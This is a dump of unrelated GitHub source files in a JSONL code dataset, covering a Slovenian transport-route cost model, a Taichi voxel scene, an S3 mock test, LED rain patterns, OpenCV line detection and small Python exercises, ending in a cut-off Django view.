\"https://maps.googleapis.com/maps/api/distancematrix/json?units=metric\"\n\nclass Uporabnik:\n def __init__(self, uporabnisko_ime, zasifrirano_geslo, stanje, pomembnost_casa=None, pomembnost_onesnazevanja=None):\n self.uporabnisko_ime = uporabnisko_ime\n self.zasifrirano_geslo = zasifrirano_geslo\n self.stanje = stanje\n self.pomembnost_casa = pomembnost_casa\n self.pomembnost_onesnazevanja = pomembnost_onesnazevanja\n \n @staticmethod\n def ime_uporabnikove_datoteke(uporabnisko_ime):\n return f\"{uporabnisko_ime}.json\"\n\n\n @staticmethod\n def prijava(uporabnisko_ime, geslo_v_cistopisu):\n uporabnik = Uporabnik.iz_datoteke(uporabnisko_ime)\n if uporabnik is None:\n raise ValueError(\"Uporabniško ime ne obstaja!\")\n elif uporabnik.preveri_geslo(geslo_v_cistopisu):\n return uporabnik \n else:\n raise ValueError(\"Geslo je napačno\")\n\n @staticmethod\n def registracija(uporabnisko_ime, geslo_v_cistopisu):\n if Uporabnik.iz_datoteke(uporabnisko_ime) is not None:\n raise ValueError(\"Uporabniško ime že obstaja\")\n else:\n zasifrirano_geslo = Uporabnik._zasifriraj_geslo(geslo_v_cistopisu)\n uporabnik = Uporabnik(uporabnisko_ime, zasifrirano_geslo, Stanje())\n uporabnik.v_datoteko()\n return uporabnik\n\n @staticmethod\n def _zasifriraj_geslo(geslo_v_cistopisu, sol=None):\n if sol is None:\n sol = str(random.getrandbits(32))\n posoljeno_geslo = sol + geslo_v_cistopisu\n h = hashlib.blake2b()\n h.update(posoljeno_geslo.encode(encoding=\"utf-8\"))\n return f\"{sol}${h.hexdigest()}\"\n\n def preveri_geslo(self, geslo_v_cistopisu):\n sol, _ = self.zasifrirano_geslo.split(\"$\")\n return self.zasifrirano_geslo == Uporabnik._zasifriraj_geslo(geslo_v_cistopisu, sol)\n\n\n def v_slovar(self):\n return {\n \"uporabnisko_ime\": self.uporabnisko_ime,\n \"zasifrirano_geslo\": self.zasifrirano_geslo,\n \"stanje\": self.stanje.v_slovar(),\n \"pomembnost_casa\": self.pomembnost_casa,\n \"pomembnost_onesnazevanja\": self.pomembnost_onesnazevanja\n }\n\n @staticmethod\n def iz_slovarja(slovar):\n uporabnisko_ime = slovar[\"uporabnisko_ime\"]\n zasifrirano_geslo = slovar[\"zasifrirano_geslo\"]\n pomembnost_casa = slovar[\"pomembnost_casa\"]\n pomembnost_onesnazevanja = slovar[\"pomembnost_onesnazevanja\"]\n stanje = Stanje.iz_slovarja(slovar[\"stanje\"])\n return Uporabnik(uporabnisko_ime, zasifrirano_geslo, stanje, pomembnost_casa, pomembnost_onesnazevanja)\n\n\n def v_datoteko(self):\n with open(\n Uporabnik.ime_uporabnikove_datoteke(self.uporabnisko_ime), \"w\") as datoteka:\n json.dump(self.v_slovar(), datoteka, ensure_ascii=False, indent=4)\n\n @staticmethod\n def iz_datoteke(uporabnisko_ime):\n try:\n with open(Uporabnik.ime_uporabnikove_datoteke(uporabnisko_ime)) as datoteka:\n slovar = json.load(datoteka)\n return Uporabnik.iz_slovarja(slovar)\n except FileNotFoundError:\n return None\n\n\n def nastavi_pomembnost_casa(self, vrednost):\n if vrednost == 'zelo':\n self.pomembnost_casa = True\n elif vrednost == 'malo':\n self.pomembnost_casa = False\n else:\n self.pomembnost_casa = None\n\n def nastavi_pomembnost_onesnazevanja(self, vrednost):\n if vrednost == 'zelo':\n self.pomembnost_onesnazevanja = True\n elif vrednost == 'malo':\n self.pomembnost_onesnazevanja = False\n else:\n self.pomembnost_onesnazevanja = None\n\n\n\n\n\nclass Pot:\n def __init__(self, zacetek, konec, sredstvo, datum, razdalja=None, trajanje=None, cena=None, izpusti=None, optimalna=None, pomembnost_casa=None, pomembnost_onesnazevanja=None, rec=True):\n self.zacetek = zacetek\n self.konec = konec\n self.sredstvo = sredstvo\n self.datum = datum\n \n if razdalja:\n self.razdalja = razdalja\n elif self.izracunana_razdalja_in_trajanje():\n self.razdalja = self.izracunana_razdalja_in_trajanje()[0]\n else:\n raise ValueError('Ne najdem poti!')\n \n if trajanje:\n self.trajanje = trajanje\n else:\n self.trajanje = self.izracunana_razdalja_in_trajanje()[1]\n \n if cena:\n self.cena = cena\n else:\n self.cena = self.izracunana_cena()\n \n if izpusti:\n self.izpusti = izpusti\n else:\n self.izpusti = self.izracunani_izpusti()\n \n if optimalna != None:\n self.optimalna = optimalna\n elif rec:\n self.optimalna = self.optimalna_pot(pomembnost_casa, pomembnost_onesnazevanja)\n\n\n def __str__(self):\n return f'Pot({self.zacetek}, {self.konec}, {self.sredstvo}, {self.datum})'\n\n\n # prevede ime sredstva v slovenščino\n def sredstvo_slo(self):\n return prevedi(self.sredstvo)\n\n \n #sestavi url za klic distance matrice preko API\n def url(self):\n if self.sredstvo == 'train' or self.sredstvo == 'bus':\n u = zacetni_url + \"&origins=\" + self.zacetek + \"&destinations=\" + self.konec + \"&mode=transit&transit_mode=\" + self.sredstvo + \"&key=\" + API_KEY\n return u\n elif self.sredstvo == 'walking' or self.sredstvo == 'bicycling':\n u = zacetni_url + \"&origins=\" + self.zacetek + \"&destinations=\" + self.konec + \"&mode=walking&key=\" + API_KEY\n return u\n elif self.sredstvo == 'driving':\n u = zacetni_url + \"&origins=\" + self.zacetek + \"&destinations=\" + self.konec + \"&mode=\" + self.sredstvo + \"&key=\" + API_KEY\n return u\n else:\n raise ValueError(\"Prevozno sredstvo ne obstaja!\")\n\n #izračuna prepotovano razdaljo med začetnim in končnim krajem z danim prevoznim sredstvom\n def izracunana_razdalja_in_trajanje(self):\n try:\n output = requests.get(self.url()).json()\n razdalja = output[\"rows\"][0][\"elements\"][0][\"distance\"][\"value\"]\n kon = output['destination_addresses']\n zac = output['origin_addresses']\n if self.sredstvo == 'bicycling':\n trajanje = (output[\"rows\"][0][\"elements\"][0][\"duration\"][\"value\"]) / 3 #povprečna hitrost mestne vožnje s kolesom je 15km/h hoje pa 5km/h\n else:\n trajanje = output[\"rows\"][0][\"elements\"][0][\"duration\"][\"value\"]\n \n return (razdalja, trajanje)\n except KeyError or IndexError:\n raise ValueError(\"Ta pot ne obstaja! Preveri vnešene podatke.\")\n\n\n #izračuna dejansko ceno poti(gorivo, stroški uporabe avtomobila, približna ocena cene vozovnic na kilometer prepotovane poti z vlakom/busom)\n #loči vlak in bus?\n def izracunana_cena(self):\n if self.sredstvo == 'driving':\n c = STROSEK_AVTOMOBILA_NA_KM * self.izracunana_razdalja_in_trajanje()[0] / 1000\n elif self.sredstvo == 'train' or self.sredstvo == 'bus':\n c = CENA_VLAK_NA_KM * self.izracunana_razdalja_in_trajanje()[0] / 1000\n else:\n c = 0\n \n return c\n\n #izračuna količino izpustov CO2, proizvedenih s potjo v gramih\n def izracunani_izpusti(self):\n if self.sredstvo == \"driving\":\n return self.izracunana_razdalja_in_trajanje()[0] * CO2_NA_KM_AVTO * 10 **(-3)\n elif self.sredstvo == \"train\":\n return self.izracunana_razdalja_in_trajanje()[0] * CO2_NA_KM_VLAK * 10 **(-3)\n elif self.sredstvo == \"bus\":\n return self.izracunana_razdalja_in_trajanje()[0] * CO2_NA_KM_BUS * 10 **(-3)\n else:\n return 0\n\n\n #določi optimalno prevozno sredstvo za dano začetno in končno točko\n #povezi z razredom uporabnik\n def optimalna_pot(self, preferenca_cas=None, preferenca_onesnazevanje=None):\n min = math.inf\n optimalna = ''\n \n for sredstvo in SREDSTVA:\n \n pot = Pot(self.zacetek, self.konec, sredstvo, self.datum, rec=False)\n if not pot:\n continue\n else:\n i = indeks(pot.trajanje, pot.izpusti, pot.cena, preferenca_cas, preferenca_onesnazevanje)\n if i < min:\n optimalna = pot\n min = i\n return {'zacetek': optimalna.zacetek, 'konec': optimalna.konec, 'sredstvo': optimalna.sredstvo, 'datum': optimalna.datum, 'razdalja': optimalna.razdalja, 'trajanje': optimalna.trajanje, 'cena': optimalna.cena, 'izpusti': optimalna.izpusti}\n\n\n#izračuna vrednost časa, ki ga porabiš za pot\ndef cena_casa(trajanje, preferenca_cas):\n if preferenca_cas:\n cena = CENA_CASA_VISOKA / 60 * trajanje\n elif preferenca_cas == None:\n cena = CENA_CASA_SREDNJA / 60 * trajanje\n else:\n cena = CENA_CASA_NIZKA / 60 * trajanje\n return cena\n\n#izračuna vrednost izpustov CO2, ki jih proizvedeš s potjo\ndef cena_izpustov(izpusti, preferenca_onesnazevanje):\n if preferenca_onesnazevanje:\n cena = CENA_IZPUSTOV_VISOKA * izpusti * 10 **(-6)\n elif preferenca_onesnazevanje == None:\n cena = CENA_IZPUSTOV_SREDNJA * izpusti * 10 **(-6)\n else:\n cena = CENA_IZPUSTOV_NIZKA * izpusti * 10 **(-6)\n return cena\n\n#izračuna celotno ceno poti skupaj z navideznimi stroški časa in izpustov CO2\ndef indeks(trajanje, izpusti, cena, preferenca_cas=None, preferenca_onesnazevanje=None):\n return cena + cena_casa(trajanje, preferenca_cas) + cena_izpustov(izpusti, preferenca_onesnazevanje)\n\ndef prevedi(ime):\n if ime == 'driving':\n return 'Avto'\n elif ime == 'walking':\n return 'Hoja'\n elif ime == 'bicycling':\n return 'Kolo'\n elif ime == 'train':\n return 'Vlak'\n elif ime == 'bus':\n return 'Bus'\n else:\n return None\n\nclass Prevozno_sredstvo:\n def __init__(self, ime, cena=0):\n self.ime = ime\n self.poti = []\n self.optimalne = []\n self.cena = cena\n\n def ime_slo(self):\n return prevedi(self.ime)\n\n # skupna dolžina vseh poti tega sredstva\n def skupna_dolzina(self):\n d = 0\n for pot in self.poti:\n d += pot.razdalja\n return d\n \n # skupno trajanje vseh poti tega sredstva\n def skupno_trajanje(self):\n t = 0\n for pot in self.poti:\n t += pot.trajanje\n return t\n \n #skupna cena vseh poti tega sredstva\n def skupna_cena(self):\n c = 0\n for pot in self.poti:\n c += pot.cena\n return c\n\n # skupna cena poti sredstva in dodatnih stroškov pri sredstvu\n def skupna_cena_sredstva(self):\n cena_sredstva = self.cena\n cena_poti = self.skupna_cena()\n skupaj = cena_sredstva + cena_poti\n return skupaj\n\n # skupni izpusti vseh poti tega sredstva v gramih\n def izpusti_co2(self):\n izpusti = 0\n for pot in self.poti:\n izpusti += pot.izpusti\n return izpusti\n\n # doda strošek, porabljen za sredstvo\n def dodaj_strosek(self, strosek):\n if ',' in strosek:\n raise ValueError('Prosimo, uporabite piko!')\n elif strosek.isnumeric() or (\".\" in strosek) or (\"-\" in strosek and strosek[1:].isnumeric()):\n if self.cena + float(strosek) < 0:\n raise ValueError(\"Stroški ne morejo biti negativni!\")\n self.cena += float(strosek)\n\n return self.cena\n else:\n raise ValueError('Prosim vnesite število!')\n\n #doda pot na seznam poti tega sredstva\n def dodaj_pot(self, pot):\n self.poti.append(pot)\n self.optimalne.append(pot.optimalna)\n \n # odstrani pot s seznama poti sredstva\n def odstrani_pot(self, pot):\n self.poti.remove(pot)\n self.optimalne.remove(pot.optimalna)\n\n\n\nclass Stanje:\n def __init__(self):\n self.prevozna_sredstva = []\n self.poti = []\n self.optimalne = []\n self.prevozna_sredstva_po_imenih = {}\n self.poti_po_sredstvih = {None: []}\n self.optimalne_po_sredstvih = {None: []}\n\n # ustvari objekt razreda sredstvo in ga doda v objekt razreda stanje\n def dodaj_sredstvo(self, ime, cena=0):\n if ime in self.prevozna_sredstva_po_imenih:\n raise ValueError(f'Prevozno sredstvo {ime} že obstaja!')\n nov = Prevozno_sredstvo(ime, cena)\n self.prevozna_sredstva.append(nov)\n self.prevozna_sredstva_po_imenih[ime] = nov\n self.poti_po_sredstvih[nov] = []\n self.optimalne_po_sredstvih[nov] = []\n return nov\n\n # odstrani sredstvo z danim imenom in njegove poti pripiše h ključu None v slovarju poti\n def odstrani_sredstvo(self, ime):\n if ime in self.prevozna_sredstva_po_imenih:\n sredstvo = self.prevozna_sredstva_po_imenih[ime]\n for pot in sredstvo.poti:\n self.poti_po_sredstvih[None].append(pot)\n for optimalna in sredstvo.optimalne:\n self.optimalne_po_sredstvih[None].append(optimalna)\n self.prevozna_sredstva.remove(sredstvo)\n del self.poti_po_sredstvih[sredstvo]\n del self.optimalne_po_sredstvih[sredstvo]\n del self.prevozna_sredstva_po_imenih[ime]\n else:\n return None\n\n # doda pot v stanje in k ustreznemu sredstvu\n # treba je vključiti še preference\n def dodaj_pot(self, zacetek, konec, sredstvo, datum, razdalja=None, trajanje=None, cena=None, izpusti=None, optimalna=None, pomembnost_casa=None, pomembnost_onesnazevanja=None, rec=True):\n if sredstvo in self.prevozna_sredstva_po_imenih:\n nova = Pot(zacetek, konec, sredstvo, datum, razdalja, trajanje, cena, izpusti, optimalna, pomembnost_casa, pomembnost_onesnazevanja, rec)\n sredstvo = self.poisci_sredstvo(sredstvo)\n self.poti.append(nova)\n self.optimalne.append(nova.optimalna)\n self.poti_po_sredstvih[sredstvo].append(nova)\n self.optimalne_po_sredstvih[sredstvo].append(nova.optimalna)\n sredstvo.dodaj_pot(nova)\n return nova\n elif razdalja == None:\n raise ValueError(f'Izbranega prevoznega sredstva nimate med svojimi sredstvi!')\n else:\n nova = Pot(zacetek, konec, sredstvo, datum, razdalja, trajanje, cena, izpusti, optimalna, pomembnost_casa, pomembnost_onesnazevanja, rec=False)\n self.poti.append(nova)\n self.optimalne.append(nova.optimalna)\n self.poti_po_sredstvih[None].append(nova)\n self.optimalne_po_sredstvih[None].append(nova.optimalna)\n return nova\n\n\n # odstrani pot iz vseh seznamov in slovarjev\n def odstrani_pot(self, pot):\n if pot in self.poti:\n if pot.sredstvo in self.prevozna_sredstva_po_imenih:\n sredstvo = self.poisci_sredstvo(pot.sredstvo)\n self.poti_po_sredstvih[sredstvo].remove(pot)\n self.optimalne_po_sredstvih[sredstvo].remove(pot.optimalna) \n self.poti.remove(pot)\n self.optimalne.remove(pot.optimalna) \n sredstvo.odstrani_pot(pot)\n else:\n self.poti_po_sredstvih[None].remove(pot)\n self.optimalne_po_sredstvih[None].remove(pot.optimalna) \n self.poti.remove(pot)\n self.optimalne.remove(pot.optimalna) \n else:\n return None\n\n # poišče objekt razreda sredstvo z danim imenom\n def poisci_sredstvo(self, ime):\n if ime in self.prevozna_sredstva_po_imenih:\n return self.prevozna_sredstva_po_imenih[ime]\n else:\n raise KeyError(f'Izbranega prevoznega sredstva nimaš med svojimi sredstvi!')\n\n # poišče objekt razreda pot z danimi podatki\n def poisci_pot(self, zacetek, konec, sredstvo, datum):\n for pot in self.poti:\n if pot.zacetek == zacetek and pot.konec == konec and pot.sredstvo == sredstvo and pot.datum == datum:\n return pot\n raise ValueError('Ta pot ne obstaja!')\n\n # izračuna skupno razdaljo vseh poti vseh sredstev\n def skupna_razdalja(self):\n d = 0\n for sredstvo in self.prevozna_sredstva:\n d += sredstvo.skupna_dolzina()\n return d\n\n # izračuna skupno trajanje poti vseh sredstev\n def skupno_trajanje(self):\n t = 0\n for sredstvo in self.prevozna_sredstva:\n t += sredstvo.skupno_trajanje()\n return t \n\n # izračuna skupno ceno vseh sredstev(vključno s stroški sredstev)\n def skupna_cena(self):\n c = 0\n for sredstvo in self.prevozna_sredstva:\n c += sredstvo.skupna_cena_sredstva()\n return c\n\n # izračuna skupno količino izpustov vseh poti vseh sredstev\n def skupni_izpusti(self):\n c = 0\n for sredstvo in self.prevozna_sredstva:\n c += sredstvo.izpusti_co2()\n return c\n\n # izračuna dolžino vseh poti, če bi vsakič izbral optimalno sredstvo\n def skupna_dolzina_optimalno(self):\n d = 0\n for pot in self.optimalne:\n d += pot[\"razdalja\"]\n return d\n\n # izračuna koliko bi trajale poti, če bi vsakič izbral optimalno sredstvo\n def skupno_trajanje_optimalno(self):\n t = 0\n for pot in self.optimalne:\n t += pot[\"trajanje\"]\n return t\n\n # izračuna koliko bi bilo stroškov, če bi vsakič izbral optimalno sredstvo\n def skupna_cena_optimalno(self):\n c = 0\n for pot in self.optimalne:\n c += pot[\"cena\"]\n return c\n\n # izračuna koliko bi bilo izpustov, če bi vsakič izbral optimalno sredstvo\n def izpusti_co2_optimalno(self):\n izpusti = 0\n for pot in self.optimalne:\n izpusti += pot[\"izpusti\"]\n return izpusti\n\n #podatke o objektu razreda stanje zapiše v slovar\n def v_slovar(self):\n return {\n \"prevozna sredstva\": [\n {\n \"ime\": sredstvo.ime,\n \"cena\": sredstvo.cena\n }\n for sredstvo in self.prevozna_sredstva\n ],\n \"poti\": [\n {\n \"zacetek\": pot.zacetek,\n \"konec\": pot.konec,\n \"sredstvo\": pot.sredstvo,\n \"datum\": str(pot.datum),\n \"razdalja\": pot.razdalja,\n \"trajanje\": pot.trajanje,\n \"cena\": pot.cena,\n \"izpusti\": pot.izpusti,\n \"optimalna\": pot.optimalna\n }\n for pot in self.poti\n ],\n }\n \n #iz slovarja prebere podatke in ustvari objekt razreda stanje\n @staticmethod\n def iz_slovarja(slovar):\n stanje = Stanje()\n for sredstvo in slovar[\"prevozna sredstva\"]:\n stanje.dodaj_sredstvo(sredstvo[\"ime\"], sredstvo[\"cena\"])\n\n for pot in slovar[\"poti\"]:\n stanje.dodaj_pot(\n pot[\"zacetek\"],\n pot[\"konec\"],\n pot[\"sredstvo\"],\n pot[\"datum\"],\n pot[\"razdalja\"],\n pot[\"trajanje\"],\n pot[\"cena\"],\n pot[\"izpusti\"],\n pot[\"optimalna\"],\n rec=False\n )\n return stanje\n \n # shrani uporabnikovo stanje v datoteko\n def shrani_stanje(self, ime_datoteke):\n with open(ime_datoteke, 'w') as dat:\n slovar = self.v_slovar()\n json.dump(slovar, dat)\n \n #prebere stanje iz datoteke z uporabnikovim stanjem\n @staticmethod\n def nalozi_stanje(ime_datoteke):\n with open(ime_datoteke) as dat:\n slovar = json.load(dat)\n return Stanje.iz_slovarja(slovar)","repo_name":"masazaucer/aplikacija-prevoz","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":20729,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27423266170","text":"from scene import Scene\nimport taichi as ti\nfrom taichi.math import *\n\ncolor = (0.6, 0.2, 0.2)\n\nscene = Scene(voxel_edges=0, exposure=10)\nscene.set_floor(-0.05, (1.0, 1.0, 1.0))\nscene.set_directional_light((-1, 1, -1), 0.1, (0.5, 0.5, 0.5))\n\n\n@ti.func\ndef makeup(end, num):\n for m in range(1, end):\n for j in range(-3, 4):\n scene.set_voxel(vec3(41+m, num, j), 1, vec3(0.6, 0.2, 0.2))\n\n@ti.kernel\ndef initialize_voxels():\n for x in ti.ndrange((0, 42)):\n if x % 14 == 0 or x == 4:\n continue\n for i in range(-3, 4):\n for j in range(-3, 4):\n scene.set_voxel(vec3(x, 56+i, j), 1, vec3(0.6, 0.2, 0.2))\n makeup(7, 59); makeup(6, 58); makeup(5, 57); makeup(4, 56); makeup(3, 55); makeup(2, 54)\n for y in ti.ndrange((0, 60)):\n if y % 15 == 0 and y < 50:\n continue\n for i in range(-3, 4):\n for j in range(-3, 4):\n scene.set_voxel(vec3(i, y, j), 1, vec3(0.6, 0.2, 0.2))\n for z in ti.ndrange((-49, 4)):\n if z == -34 or z == -19:\n continue\n for i in range(-3, 4):\n for j in range(-3, 4):\n scene.set_voxel(vec3(i, j, z), 1, vec3(0.6, 0.2, 0.2))\n\ninitialize_voxels()\nscene.finish()","repo_name":"mrzhuzhe/sunx","sub_path":"triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"41608141891","text":"SOURCE_BUCKET = \"source-test\"\nDESTINATION_BUCKET = \"dest-test\"\nKEY = \"test/test.py\"\n\n# mock s3 client\n@pytest.fixture\ndef s3():\n \"\"\"Pytest fixture that creates two buckets and key\n Yields a fake boto3 s3 client\n \"\"\"\n with mock_s3():\n s3 = boto3.client(\"s3\")\n s3.create_bucket(Bucket=DESTINATION_BUCKET)\n s3.create_bucket(Bucket=SOURCE_BUCKET)\n s3.put_object(Bucket=SOURCE_BUCKET, Key=KEY)\n yield s3\n \ndef test_copy_object(s3):\n\n assert function.copy_object(\n s3, dest_bucket) == SUCCESS_MESSAGE\n","repo_name":"hunterpack/code-snippets","sub_path":"python/tests/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"28627783431","text":"import random\nimport colorsys\n\n\n# Drops are more dense and on average brighter near the wave centre\ndensity_away_from_wave = 1 / 15 # Matches baseline rainfall\ndensity_near_wave = 4 / 15\ndensity_at_wave = 4 / 15\n\n# Each of these is a range corresponding to arguments to random.randint\nintensity_away_from_wave = (25, 75) # Matches baseline rainfall\nintensity_near_wave = (50, 150)\nintensity_at_wave = (50, 150)\n\n# What change in hue does a rainbow wave experience from one end to the other\nrainbow_hue_range = 0.3\n\n\ndef clip3(val, min=0.0, max=1.0):\n \"\"\" Clip a value to within a min and max range \"\"\"\n if val < min:\n return min\n elif val > max:\n return max\n else:\n return val\n\n\nclass RainWaves:\n \"\"\" Generic class covering both rainbow and fixed colour waves \"\"\"\n\n def __init__(self, rainbow):\n self.rainbow = rainbow\n if rainbow:\n # For rainbow waves the hue will vary as it moves. The hue we\n # store here is what is seen at the left edge. To ensure the\n # rainbow doesn't go out of range we cap the starting hue.\n self.wave_hue = random.random() * (1 - rainbow_hue_range)\n else:\n self.wave_hue = random.random()\n\n if random.randint(0, 1) == 0:\n # Wave from left to right\n self.wave_pos = -5.0\n self.wave_velocity = 0.1\n else:\n # Wave from right to left\n self.wave_pos = 20.0\n self.wave_velocity = -0.1\n\n def generate(self, led_state, transition, tick):\n # Move the wave along\n self.wave_pos += self.wave_velocity\n\n # Move all the LED positions down by one, shifting in black\n for strip in led_state:\n strip[:] = [(0, 0, 0)] + strip[:-1]\n\n # Generate a \"drip\" on some random strips. Drips are more dense and\n # brighter around the wave position\n for strip_num, strip in enumerate(led_state):\n if abs(strip_num - self.wave_pos) < 1.0:\n density = density_at_wave\n intensity = intensity_at_wave\n elif abs(strip_num - self.wave_pos) < 3.0:\n density = density_near_wave\n intensity = intensity_near_wave\n else:\n density = density_away_from_wave\n intensity = intensity_away_from_wave\n\n if random.random() < density:\n # Generate a drop\n drop_intensity = random.randint(*intensity) / 255\n\n if abs(strip_num - self.wave_pos) < 5.0:\n drop_saturation = 1 - abs(strip_num - self.wave_pos) / 5.0\n drop_saturation = drop_saturation ** 0.5\n else:\n drop_saturation = 0.0\n\n if self.rainbow:\n hue = self.wave_hue + \\\n clip3(self.wave_pos / 15.0) * rainbow_hue_range\n else:\n hue = self.wave_hue\n\n drop_hsv = (hue, drop_saturation, drop_intensity)\n rgb = colorsys.hsv_to_rgb(*drop_hsv)\n drop_colour = tuple(255 * x for x in rgb)\n strip[0] = drop_colour\n\n\nclass RainColourWaves(RainWaves):\n name = \"Rain Colour Waves\"\n transition_len = 0\n pattern_len = 8000\n\n def __init__(self):\n super().__init__(rainbow=False)\n\n\nclass RainbowWaves(RainWaves):\n name = \"Rainbow Waves\"\n transition_len = 0\n pattern_len = 8000\n\n def __init__(self):\n super().__init__(rainbow=True)\n","repo_name":"cillian64/bitstream","sub_path":"software/playlist/rain_colour_waves.py","file_name":"rain_colour_waves.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"36225465247","text":"import os\n\nfrom pydmt.api.feature import Feature\nfrom pydmt.builders.mako import BuilderMako\nfrom pydmt.core.pydmt import PyDMT\nfrom pydmt.utils.filesystem import files_under_folder\n\n\nclass FeatureMako(Feature):\n def __init__(\n self,\n data=None,\n templates_folder: str = \"templates\",\n config_folder: str = \"config\",\n snipplet_folder: str = \"snipplets\",\n ):\n self.data = data\n self.templates_folder = templates_folder\n self.config_folder = config_folder\n self.snipplet_folder = snipplet_folder\n\n def setup(self, pydmt: PyDMT) -> None:\n if not os.path.isdir(self.templates_folder):\n return\n for root, _, filenames in os.walk(self.templates_folder):\n for filename in filenames:\n source = os.path.join(root, filename)\n target_base, ext = os.path.splitext(source)\n if ext == '.mako':\n target = os.sep.join(target_base.split(os.sep)[1:])\n builder = BuilderMako(\n source=source,\n target=target,\n data=self.data,\n config_files=files_under_folder(self.config_folder, suffix=\".py\"),\n snipplet_files=files_under_folder(self.snipplet_folder, suffix=\".mako\"),\n )\n pydmt.add_builder(builder)\n","repo_name":"veltzer/pydmt","sub_path":"pydmt/features/mako.py","file_name":"mako.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"10048201094","text":"import cv2\nimport numpy as np\n\n\"\"\"霍夫圆检测,放弃:圆柱是固定的,不需要检测\ndef circles_det(img):\n h = img.shape[0]\n w = img.shape[1]\n if h * w > 6000:\n dp = 1\n else:\n dp = 2 # 分辨率不足时,提高dp参数阈值\n d = (int)(w / 2) # d表示检测到的圆心之间的最小距离\n r_min = (int)((w / 4.2) / 2) # 最小半径\n r_max = (int)((w / 3.2) / 2) # 最大半径\n\n # 灰度化\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # 形态学腐蚀\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))\n gray = cv2.morphologyEx(gray, cv2.MORPH_OPEN, kernel, iterations=3)\n\n gray = cv2.medianBlur(gray, 5)\n # ret, th1 = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\n th2 = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 3, 5)\n # th3 = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 3, 5)\n\n kernel = np.ones((5, 5), np.uint8)\n erosion = cv2.erode(th2, kernel, iterations=1)\n # dilation = cv2.dilate(erosion, kernel, iterations=1)\n\n # 边缘检测\n imgray = cv2.Canny(erosion, 30, 100)\n\n # 霍夫圆检测\n circles = cv2.HoughCircles(imgray, cv2.HOUGH_GRADIENT, dp, d, param1=100, param2=5, minRadius=r_min,\n maxRadius=r_max)\n try:\n circles = np.uint16(np.around(circles))\n except TypeError:\n print(\"未检测到圆!\")\n return -1\n\n # 画圆\n count = 0\n for i in circles[0, :]:\n # draw the outer circle\n cv2.circle(img, (i[0], i[1]), i[2], (0, 255, 0), 1)\n # draw the center of the circle\n cv2.circle(img, (i[0], i[1]), 1, (0, 0, 255), 1)\n count = count + 1\n if count >= 2:\n break\n\n return circles[0]\n\"\"\"\n\n\ndef plate_det(img):\n # 灰度化\n try:\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n except Exception:\n print(\"图片错误\")\n exit()\n\n # 获取尺寸\n h = img.shape[0]\n w = img.shape[1]\n # 检测区域范围\n top = int(h * 2 / 5)\n bottom = int(h / 2)\n left = int(w / 2)\n right = int(w)\n cv2.rectangle(img, (left, top), (right, bottom), (0, 0, 255), 1)\n\n # 边缘检测\n try:\n edges = cv2.Canny(gray, 50, 200)\n except Exception:\n print(\"边缘检测出错\")\n exit()\n\n minLineLength = w / 10 # 最小线段长度\n if h * w > 6000:\n maxLineGap = 5 # 线段允许间隔的最大距离,超过此距离则判定为两条线段\n else:\n maxLineGap = 1\n # 直线检测\n try:\n lines = cv2.HoughLinesP(edges, 1, np.pi / 180, 10, minLineLength, maxLineGap)\n except Exception:\n print(\"直线检测出错\")\n exit()\n\n # 遍历检测到的每条线段,若在指定范围内存在线段,则返回1\n count = 0\n for i in range(len(lines)):\n for x1, y1, x2, y2 in lines[i]:\n cv2.line(img, (x1, y1), (x2, y2), (i * 20, 100 + i * 20, 255), 1)\n if left < x1 < right and top < y1 < bottom or left < x2 < right and top < y2 < bottom:\n cv2.line(img, (x1, y1), (x2, y2), (255, 0, 255), 1)\n count = count + 1\n # print(\"count:\", count)\n if count > 1:\n return 1\n return 0\n","repo_name":"Llixin/plate_detection","sub_path":"plate_det.py","file_name":"plate_det.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"19082837783","text":"n = int(input(\"Enter a num: \"))\nsum = 0\norder = len(str(n))\noriginal_n = n\n\nwhile (n>0):\n digit = n%10 # to take the last digit\n sum += digit ** order # mul by the number of digits\n n = n // 10 # removing the last digit until number becomes 0\n\nif (sum == original_n):\n print(f\"{original_n} is Armstrong num\")\nelse: \n print(f\"{original_n} is not an Armstrong num\")\n\n","repo_name":"Bilal-Sheikh/PythonPrograms","sub_path":"Armstrong.py","file_name":"Armstrong.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34892583786","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.http import JsonResponse\nfrom django.db import IntegrityError\nfrom ..models import *\nfrom ..constants import *\nfrom ..serializers import *\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n# Lists all posts of user\nclass myPosts(APIView):\n # GET request\n def get(self, request):\n username = request.GET.get(username_param)\n try:\n u = UserProfile.objects.get(username=username)\n reviews = Review.objects.filter(userID=u)\n polls = Poll.objects.filter(userID=u)\n\n topicData = {}\n for review in reviews:\n t = Topic.objects.get(pk=review.topicID.pk)\n topicData[t.pk] = t.title\n\n pcData = {}\n for poll in polls:\n pc = PollChoice.objects.filter(pollID=poll)\n pcSerializer = PollChoiceSerializer(pc, many=True)\n pcData[poll.pk] = pcSerializer.data\n\n reviewsSerializer = ReviewSerializer(reviews, many=True)\n pollsSerializer = PollSerializer(polls, many=True)\n response = reviewsSerializer.data + pollsSerializer.data\n return 